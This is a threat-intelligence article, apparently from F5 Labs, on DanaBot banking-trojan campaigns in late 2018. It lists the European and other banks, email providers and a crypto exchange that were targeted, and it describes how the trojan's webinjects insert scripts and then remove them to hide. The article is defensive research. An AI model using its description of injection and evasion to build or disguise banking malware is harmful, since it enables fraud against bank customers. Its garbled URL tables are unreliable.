December 17, 2018

DanaBot November Campaigns Target European Banks and Email Providers

6 min. read
App Tiers Affected:

First detected in May 2018,1 DanaBot is a banking trojan that has since shifted its targets from banks in Australia to banks in Europe, as well as global email providers such as Google, Microsoft and Yahoo for the holiday phishing season. Eighty-eight percent of DanaBot’s targets between November 7 and December 4, 2018 were banking customers, primarily in Italy, followed by Poland and Germany, according to an F5 SOC Research project for Websafe that analyzed active campaigns between November 7 and December 4, 2018.

Figure 1: DanaBot industry targets November 7 - December 4, 2018

DanaBot authors have been running four primary campaigns that target the following:

  1. The main campaign targeted multiple countries and industries, including banks, email providers, and a bitcoin exchange, primarily in Italy, followed by Poland, Germany, Austria, Switzerland, and the Netherlands.
  2. The second most active campaign targeted German banks.
  3. The third most active campaign targeted Polish banks.
  4. The fourth most active campaign targeted one Australian bank.

The main multi-industry and country-targeted campaign appeared consistently during the month of November. The other dedicated campaigns were found in parallel but only on specific days rather than day after day. November 21, 2018 was the only day we saw all four campaigns active.

Figure 2: DanaBot campaign activity by day and targets

When looking at all targets by country across all campaigns, it’s clear that DanaBot authors are focused on Italian targets, followed by targets in Poland and Germany. The targets attributed to the US are large email service providers that are used globally.

Figure 3: DanaBot Targets by Country

Multiple Campaign Targets

The following banks were targeted in this campaign, organized by country (note some banks have a presence in many countries, however, attackers reveal their intended targets when specifying a country-specific banking URL):

URL Country Business*" Austria Bank Austria*" Austria Raiffeisen Bank*" Austria Raiffeisen Bank
https://*.at/banking/*" Austria Unknown*" Austria WSK Bank*" Germany BV-Active Banking*" Germany Commerz Bank*" Germany Deutsche Bank*" Germany Fidor Bank
https://banking.spard*de/spm/*" Germany Sparda Bank*" Italy Banca Euro*" Italy Banco Posta*" Italy Banco Posta*" Italy Banking4You*htm*" Italy Banking4You*" Italy BNL Bank*" Italy BNL Bank*=*" Italy BNL Bank*" Italy BPER Bank*/movimenti*" Italy BPER Bank*=*" Italy BPER Bank*id=internationalbeneficiary_WAR*" Italy BPER Bank*id=pagamenti_WAR_webcontocutilitiesportlet*" Italy BPER Bank*" Italy BPM Bank*" Italy BPM Bank*" Italy CHE Bank*" Italy CHE Bank*" Italy Credem Bank*" Italy Credem Bank*" Italy Credem Bank*" Italy Credit Agricole Bank*" Italy Credit Agricole Bank*/stile.cs*" Italy CSE Bank*.j*" Italy CSE Bank*" Italy Deutsche Bank*" Italy Generali Bank*htm*" Italy Generali Bank*" Italy Gruppo Carige Bank*" Italy Gruppo Carige Bank*" Italy Gruppo Carige Bank*" Italy Hello Bank*" Italy Inbank*" Italy ING Bank*" Italy Intesa San Paolo Bank*" Italy Intesa San Paolo Bank*" Italy MPS Bank*" Italy Prossima Bank*" Italy Relax Bank*" Italy Scrigno Bank*" Italy UBI Bank*" Italy UBI Bank*" Italy UBI Bank
https://e-bank.*agricole.p*" Poland Agricole Bank
https://system.aliorbank.*" Poland Alior Bank*" Poland Bank BGZ BNP Paribas*" Poland BOS Bank
https://ebo.*.pl/*" Poland EBO Bank*" Poland GB24 Bank*" Poland IBiznes24 Bank*" Poland iPKO Bank*" Poland Nest Bank*" Poland Nest Bank*" Poland Plus 24 Bank*" Poland Raiffeisen Bank
https://sgbonline.sgb.p*" Poland SGB Bank*" Poland T-MOBILE Bankowe*" Poland Toyota Bank*" Switzerland Raiffeisen Bank*" US Citi Bank

The authors also targeted the following email services and platforms of major technology and entertainment providers across Europe and the US:

URL Country Business
https://**" Germany GMX*" Germany GMX*" Italy Vianova
**Main* Italy Libero*" Italy Tecnocasa*.as*" Italy Quercia
https://**/main_swissco*" Switzerland Bluewin*" Unknown One*" US Google*" US Microsoft*" US Yahoo

The following crypto-exchange out of the Netherlands was also targeted:

URL Country Business*" Netherlands BitBay

Germany Campaign Targets

The following businesses were targeted in the Germany campaign:

URL Location Business
https://**" Germany Berlin Bank
https://*banking.sparda-*" Germany Sparda Bank
https://**" Germany Sparda Bank
https://*", Germany Sparda Bank
https://**" Germany Com Direct Bank
https://**" Germany Commerz Bank
https://**" Germany Comdirect bank
https://**" Germany Deutsche Bank
https://**" Germany Noris Bank
https://**" Germany Targo Bank

Poland Campaign Targets

All of the identifiable targets in this campaign are banks.

URL Location Business
https://system.aliorbank.*", Poland Alior Bank*", Poland Nest Bank*", Poland Nest Bank*", Poland Plus Bank 24*", Poland Raiffeisen Bank*", Poland Santander Bank*", Poland T-Mobile Bank

Australian Campaign Targets

The Australian campaign targeted one bank over two URLs:

URL Location Business
https://**" Australia Comm Bank
https://**" Australia Comm Bank

Webinject Crafting Goes Professional Part 2

DanaBot is using the same webinject pattern used in the past by Tinba and Gozi, as we reported in May 2016. This same webinjection infrastructure behavior by DanaBot, Tinba, and Gozi strongly supports our claim in our previous article that a great deal of fraud business logic is now implemented in JavaScript and contained in the webinjects.

Note this example of a script used in both Tinba and Gozi in 2016. Both use the same element names and injection routine:

Figure 4: Tinba and Gozi injection routine, 2016

In Gozi 2016, the malware is using a placeholder @ID@, probably for the BOT-ID, in script id valued as myjs3. DanaBot is using the actual BOT-ID in script id valued as myjs3.

Figure 5: Webinject used in Gozi, 2016

Now, compare that to this example used recently in DanaBot. In Gozi 2016, the malware is injecting a JavaScript named myjs8_amo.js onto the injected user page. DanaBot malware is using an injected script named myjs28_frr_w1.js. In order to mask its activity on the injected page, the malware removes suspicious scripts immediately after execution by using removeChild and getElementById.

Figure 6: Webinject used in DanaBot, November 2018


As with all banking trojans, DanaBot actively updates its campaign targets to both avoid detection and maintain continual operations to optimize the attacker’s financial reward. We are not surprised to see a geographically diverse range of targets during the peak holiday phishing and fraud season. However, what is notable is the focus on European banks, most specifically the Italian banks.

While we do not know who is maintaining this malware, the threat actors are using the same injection patterns as those used by older, successful banking trojans like Gozi and Tinba. Given this progression, we wouldn’t be surprised if this malware continued its increased activity in 2019.

All organizations, especially the known targets identified in this article, should make their customers aware that they are being targeted through phishing and spam campaigns. The main purpose of these campaigns is to plant malware on their machines that is designed to steal money from their bank accounts and gain access to their email.

To combat the impact of fraudulent transactions occurring as the result of malware-infected customer machines, organizations should implement fraud detections within their web platforms that can detect banking trojans and block resulting fraudulent transactions. For more details on how to combat phishing attacks that lead to fraud, see F5 Labs’ 2018 Phishing and Fraud Report.

App Tiers Affected:


Join the Discussion


Expertly picked stories on threat intelligence

Hundreds of apps will be attacked by the time you read this.

So, we get to work. We obsess over effective attack methods. We monitor the growth of IoT and its evolving threats. We dive deep into the latest crypto-mining campaigns. We analyze banking Trojan targets. We dissect exploits. We hunt for the latest malware. And then our team of experts share it all with you. For more than 20 years, F5 has been leading the app delivery space. With our experience, we are passionate about educating the security community-providing the intel you need to stay informed so your apps can stay safe.


9 hrs

a critical vulnerability—with the potential for remote code execution—is released.